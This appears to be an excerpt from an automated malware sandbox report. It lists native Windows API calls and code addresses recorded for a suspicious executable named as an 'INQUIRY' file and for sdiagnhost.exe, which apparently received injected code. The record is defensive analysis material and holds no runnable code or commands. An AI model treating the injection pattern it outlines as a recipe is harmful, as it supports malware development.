Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2D10 NtMapViewOfSection,		0_2_019D2D10
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2D00 NtSetInformationFile,		0_2_019D2D00
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2D30 NtUnmapViewOfSection,		0_2_019D2D30
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2CA0 NtQueryInformationToken,		0_2_019D2CA0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2CC0 NtQueryVirtualMemory,		0_2_019D2CC0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2CF0 NtOpenProcess,		0_2_019D2CF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2C00 NtQueryInformationProcess,		0_2_019D2C00
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2C60 NtCreateKey,		0_2_019D2C60
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2F90 NtProtectVirtualMemory,		0_2_019D2F90
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2FB0 NtResumeThread,		0_2_019D2FB0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2FA0 NtQuerySection,		0_2_019D2FA0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2FE0 NtCreateFile,		0_2_019D2FE0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2F30 NtCreateSection,		0_2_019D2F30
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2F60 NtCreateProcessEx,		0_2_019D2F60
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2E80 NtReadVirtualMemory,		0_2_019D2E80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2EA0 NtAdjustPrivilegesToken,		0_2_019D2EA0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2EE0 NtQueueApcThread,		0_2_019D2EE0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D2E30 NtWriteVirtualMemory,		0_2_019D2E30
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D3090 NtSetValueKey,		0_2_019D3090
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D3010 NtOpenDirectoryObject,		0_2_019D3010
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D39B0 NtGetContextThread,		0_2_019D39B0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D3D10 NtOpenProcessToken,		0_2_019D3D10
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D3D70 NtOpenThread,		0_2_019D3D70
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D44650 NtSuspendThread,LdrInitializeThunk,		8_2_04D44650
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D44340 NtSetContextThread,LdrInitializeThunk,		8_2_04D44340
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42CA0 NtQueryInformationToken,LdrInitializeThunk,		8_2_04D42CA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42C70 NtFreeVirtualMemory,LdrInitializeThunk,		8_2_04D42C70
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42C60 NtCreateKey,LdrInitializeThunk,		8_2_04D42C60
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42DD0 NtDelayExecution,LdrInitializeThunk,		8_2_04D42DD0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42DF0 NtQuerySystemInformation,LdrInitializeThunk,		8_2_04D42DF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42D10 NtMapViewOfSection,LdrInitializeThunk,		8_2_04D42D10
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42D30 NtUnmapViewOfSection,LdrInitializeThunk,		8_2_04D42D30
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42EE0 NtQueueApcThread,LdrInitializeThunk,		8_2_04D42EE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42E80 NtReadVirtualMemory,LdrInitializeThunk,		8_2_04D42E80
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42FE0 NtCreateFile,LdrInitializeThunk,		8_2_04D42FE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42FB0 NtResumeThread,LdrInitializeThunk,		8_2_04D42FB0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42F30 NtCreateSection,LdrInitializeThunk,		8_2_04D42F30
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42AD0 NtReadFile,LdrInitializeThunk,		8_2_04D42AD0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42AF0 NtWriteFile,LdrInitializeThunk,		8_2_04D42AF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,		8_2_04D42BF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42BE0 NtQueryValueKey,LdrInitializeThunk,		8_2_04D42BE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42BA0 NtEnumerateValueKey,LdrInitializeThunk,		8_2_04D42BA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42B60 NtClose,LdrInitializeThunk,		8_2_04D42B60
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D435C0 NtCreateMutant,LdrInitializeThunk,		8_2_04D435C0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D439B0 NtGetContextThread,LdrInitializeThunk,		8_2_04D439B0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42CC0 NtQueryVirtualMemory,		8_2_04D42CC0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42CF0 NtOpenProcess,		8_2_04D42CF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42C00 NtQueryInformationProcess,		8_2_04D42C00
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42DB0 NtEnumerateKey,		8_2_04D42DB0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42D00 NtSetInformationFile,		8_2_04D42D00
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42EA0 NtAdjustPrivilegesToken,		8_2_04D42EA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42E30 NtWriteVirtualMemory,		8_2_04D42E30
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42F90 NtProtectVirtualMemory,		8_2_04D42F90
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42FA0 NtQuerySection,		8_2_04D42FA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42F60 NtCreateProcessEx,		8_2_04D42F60
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42AB0 NtWaitForSingleObject,		8_2_04D42AB0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D42B80 NtQueryInformationFile,		8_2_04D42B80
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D43090 NtSetValueKey,		8_2_04D43090
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D43010 NtOpenDirectoryObject,		8_2_04D43010
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D43D70 NtOpenThread,		8_2_04D43D70
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D43D10 NtOpenProcessToken,		8_2_04D43D10
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BB9A40 NtReadFile,		8_2_02BB9A40
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BB9BD0 NtClose,		8_2_02BB9BD0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BB9B30 NtDeleteFile,		8_2_02BB9B30
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BB98D0 NtCreateFile,		8_2_02BB98D0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_02BB9D20 NtAllocateVirtualMemory,		8_2_02BB9D20

Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_00068F23		0_2_00068F23
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0005E8D3		0_2_0005E8D3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_000608F3		0_2_000608F3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0006711F		0_2_0006711F
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_00067123		0_2_00067123
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_000531B0		0_2_000531B0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0005EA18		0_2_0005EA18
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0005EA23		0_2_0005EA23
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0007F663		0_2_0007F663
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_000606CA		0_2_000606CA
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_000606D3		0_2_000606D3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A541A2		0_2_01A541A2
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A601AA		0_2_01A601AA
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A581CC		0_2_01A581CC
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01990100		0_2_01990100
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A3A118		0_2_01A3A118
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A28158		0_2_01A28158
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A32000		0_2_01A32000
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A603E6		0_2_01A603E6
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019AE3F0		0_2_019AE3F0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5A352		0_2_01A5A352
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A202C0		0_2_01A202C0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A40274		0_2_01A40274
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A60591		0_2_01A60591
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0535		0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A4E4F6		0_2_01A4E4F6
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A44420		0_2_01A44420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A52446		0_2_01A52446
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199C7C0		0_2_0199C7C0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C4750		0_2_019C4750
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0770		0_2_019A0770
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BC6E0		0_2_019BC6E0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A6A9A6		0_2_01A6A9A6
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A29A0		0_2_019A29A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B6962		0_2_019B6962
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019868B8		0_2_019868B8
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019CE8F0		0_2_019CE8F0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A2840		0_2_019A2840
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019AA840		0_2_019AA840
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A56BD7		0_2_01A56BD7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5AB40		0_2_01A5AB40
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199EA80		0_2_0199EA80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B8DBF		0_2_019B8DBF
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0199ADE0		0_2_0199ADE0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019AAD00		0_2_019AAD00
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A3CD1F		0_2_01A3CD1F
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A40CB5		0_2_01A40CB5
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01990CF2		0_2_01990CF2
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0C00		0_2_019A0C00
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A1EFA0		0_2_01A1EFA0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01992FC8		0_2_01992FC8
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019ACFE0		0_2_019ACFE0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A42F30		0_2_01A42F30
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019C0F30		0_2_019C0F30
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019E2F28		0_2_019E2F28
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A14F40		0_2_01A14F40
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019B2E90		0_2_019B2E90
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5CE93		0_2_01A5CE93
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5EEDB		0_2_01A5EEDB
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5EE26		0_2_01A5EE26
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A0E59		0_2_019A0E59
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019AB1B0		0_2_019AB1B0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A6B16B		0_2_01A6B16B
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0198F172		0_2_0198F172
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019D516C		0_2_019D516C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5F0E0		0_2_01A5F0E0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A570E9		0_2_01A570E9
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A70C0		0_2_019A70C0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A4F0CC		0_2_01A4F0CC
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019E739A		0_2_019E739A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5132D		0_2_01A5132D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_0198D34C		0_2_0198D34C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A52A0		0_2_019A52A0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A412ED		0_2_01A412ED
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BB2C0		0_2_019BB2C0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A3D5B0		0_2_01A3D5B0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A695C3		0_2_01A695C3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A57571		0_2_01A57571
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5F43F		0_2_01A5F43F
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01991460		0_2_01991460
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5F7B0		0_2_01A5F7B0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A516CC		0_2_01A516CC
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019E5630		0_2_019E5630
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A35910		0_2_01A35910
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A9950		0_2_019A9950
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BB950		0_2_019BB950
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A38E0		0_2_019A38E0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A0D800		0_2_01A0D800
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BFB80		0_2_019BFB80
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A15BF0		0_2_01A15BF0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019DDBF9		0_2_019DDBF9
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5FB76		0_2_01A5FB76
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A41AA3		0_2_01A41AA3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A3DAAC		0_2_01A3DAAC
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019E5AA0		0_2_019E5AA0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A4DAC6		0_2_01A4DAC6
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A13A6C		0_2_01A13A6C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A57A46		0_2_01A57A46
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5FA49		0_2_01A5FA49
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019BFDC0		0_2_019BFDC0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A57D73		0_2_01A57D73
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A3D40		0_2_019A3D40
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A51D5A		0_2_01A51D5A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A5FCF2		0_2_01A5FCF2
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_01A19C32		0_2_01A19C32
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe	Code function: 0_2_019A1F92		0_2_019A1F92
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DBE4F6		8_2_04DBE4F6
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DC2446		8_2_04DC2446
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DB4420		8_2_04DB4420
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DD0591		8_2_04DD0591
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D10535		8_2_04D10535
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D2C6E0		8_2_04D2C6E0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D34750		8_2_04D34750
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D10770		8_2_04D10770
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DA2000		8_2_04DA2000
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DC81CC		8_2_04DC81CC
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DD01AA		8_2_04DD01AA
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DC41A2		8_2_04DC41A2
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D98158		8_2_04D98158
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DAA118		8_2_04DAA118
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D00100		8_2_04D00100
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D902C0		8_2_04D902C0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DB0274		8_2_04DB0274
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D1E3F0		8_2_04D1E3F0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DD03E6		8_2_04DD03E6
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCA352		8_2_04DCA352
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D00CF2		8_2_04D00CF2
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DB0CB5		8_2_04DB0CB5
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D10C00		8_2_04D10C00
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D0ADE0		8_2_04D0ADE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D28DBF		8_2_04D28DBF
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DACD1F		8_2_04DACD1F
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D1AD00		8_2_04D1AD00
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCEEDB		8_2_04DCEEDB
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D22E90		8_2_04D22E90
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCCE93		8_2_04DCCE93
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D10E59		8_2_04D10E59
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCEE26		8_2_04DCEE26
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D02FC8		8_2_04D02FC8
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D1CFE0		8_2_04D1CFE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D8EFA0		8_2_04D8EFA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D84F40		8_2_04D84F40
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D30F30		8_2_04D30F30
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DB2F30		8_2_04DB2F30
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D52F28		8_2_04D52F28
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D3E8F0		8_2_04D3E8F0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04CF68B8		8_2_04CF68B8
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D1A840		8_2_04D1A840
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D12840		8_2_04D12840
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D129A0		8_2_04D129A0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DDA9A6		8_2_04DDA9A6
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D26962		8_2_04D26962
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D0EA80		8_2_04D0EA80
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DC6BD7		8_2_04DC6BD7
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCAB40		8_2_04DCAB40
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D01460		8_2_04D01460
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCF43F		8_2_04DCF43F
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DD95C3		8_2_04DD95C3
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DAD5B0		8_2_04DAD5B0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DC7571		8_2_04DC7571
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DC16CC		8_2_04DC16CC
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D55630		8_2_04D55630
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCF7B0		8_2_04DCF7B0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D170C0		8_2_04D170C0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DBF0CC		8_2_04DBF0CC
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DC70E9		8_2_04DC70E9
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DCF0E0		8_2_04DCF0E0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D1B1B0		8_2_04D1B1B0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04DDB16B		8_2_04DDB16B
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 8_2_04D4516C		8_2_04D4516C
